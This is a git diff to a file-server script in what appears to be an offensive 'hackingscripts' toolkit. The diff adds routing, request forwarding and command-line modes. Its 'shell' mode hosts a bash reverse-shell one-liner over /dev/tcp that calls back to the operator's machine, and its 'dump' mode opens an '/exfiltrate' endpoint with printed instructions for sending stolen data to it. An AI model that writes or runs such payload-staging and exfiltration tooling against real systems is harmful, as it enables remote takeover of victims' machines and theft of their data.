diff --git a/fileserver.py b/fileserver.py index 57850cc..59bd5fc 100755 --- a/fileserver.py +++ b/fileserver.py @@ -3,6 +3,7 @@ from hackingscripts import util from http.server import BaseHTTPRequestHandler, HTTPServer import threading +import requests import sys import os import ssl @@ -15,13 +16,26 @@ class FileServerRequestHandler(BaseHTTPRequestHandler): def do_POST(self): self.do_GET() + def onForward(self, target): + queryStr = "" if "?" not in self.path else self.path[self.path.index("?")+1:] + if queryStr: + target += "?" if "?" not in target else "&" + target += queryStr + + method = self.command + res = requests.request(method, target) + return res.content, res.status_code + def do_GET(self): - path = self.path if "?" not in self.path else self.path[0:self.path.find("?")] - if path in self.server.files: - data = self.server.files[path] - self.send_response(200) + + path = self.server.cleanPath(self.path) + if path in self.server.routes: + data, code = self.server.routes[path](self) + self.send_response(code) self.end_headers() - self.wfile.write(data) + + if data: + self.wfile.write(data) else: self.send_response(404) self.end_headers() @@ -42,34 +56,40 @@ class FileServerRequestHandler(BaseHTTPRequestHandler): def log_message(self, format, *args): if self.server.logRequests: - # BaseHTTPRequestHandler.log_message(format, *args) super().log_message(format, *args) class HttpFileServer(HTTPServer): def __init__(self, addr, port): super().__init__((addr, port), FileServerRequestHandler) self.logRequests = False + self.routes = { } self.dumpRequests = [] - self.files = { } + + def cleanPath(self, path): + + if "?" in path: + path = path[0:path.find("?")] + + if not path.startswith("/"): + path = "/" + path + + return path.strip() def addFile(self, name, data): if isinstance(data, str): data = data.encode("UTF-8") - if not name.startswith("/"): - name = "/" + name - self.files[name.strip()] = data - def addFile(self, name, data): - if isinstance(data, str): - data = data.encode("UTF-8") - if not name.startswith("/"): - name = "/" + name - self.files[name.strip()] = data + # return 200 - OK and data + self.addRoute(name, lambda req: (data, 200)) def dumpRequest(self, name): - if not name.startswith("/"): - name = "/" + name - self.dumpRequests.append(name) + self.dumpRequests.append(self.cleanPath(name)) + + def addRoute(self, path, func): + self.routes[self.cleanPath(path)] = func + + def forwardRequest(self, path, target): + self.addRoute(path, lambda req: req.onForward(target)) def enableLogging(self): self.logRequests = True @@ -99,13 +119,27 @@ class HttpFileServer(HTTPServer): t.start() return t -# EXAMPLE + def start(self): + return self.serve_forever() + if __name__ == "__main__": - listenPort = 4444 if len(sys.argv) < 2 else int(sys.argv[1]) + if len(sys.argv) < 2 or sys.argv[1] not in ["shell","dump","proxy"]: + print("Usage: %s [shell,dump,proxy]" % sys.argv[0]) + exit(1) + + fileServer = HttpFileServer("0.0.0.0", 80) ipAddress = util.getAddress() - rev_shell = "bash -i >& /dev/tcp/%s/%d 0>&1" % (ipAddress, listenPort) - fileServer = HttpFileServer("0.0.0.0", 80) - fileServer.addFile("shell.sh", rev_shell) - fileServer.startBackground() - print("Reverse Shell URL: http://%s/shell.sh" % ipAddress) + if sys.argv[1] == "shell": + listenPort = 4444 if len(sys.argv) < 3 else int(sys.argv[2]) + rev_shell = "bash -i >& /dev/tcp/%s/%d 0>&1" % (ipAddress, listenPort) + fileServer.addFile("shell.sh", rev_shell) + print("Reverse Shell URL: http://%s/shell.sh" % ipAddress) + elif sys.argv[1] == "dump": + fileServer.dumpRequest("/exfiltrate") + print("Exfiltrate data using: http://%s/exfiltrate" % ipAddress) + elif sys.argv[1] == "proxy": + fileServer.forwardRequest("/proxy", "https://google.com") + print("Exfiltrate data using: http://%s/proxy" % ipAddress) + + fileServer.start() diff --git a/linux-exploit-suggester.sh b/linux-exploit-suggester.sh old mode 100644 new mode 100755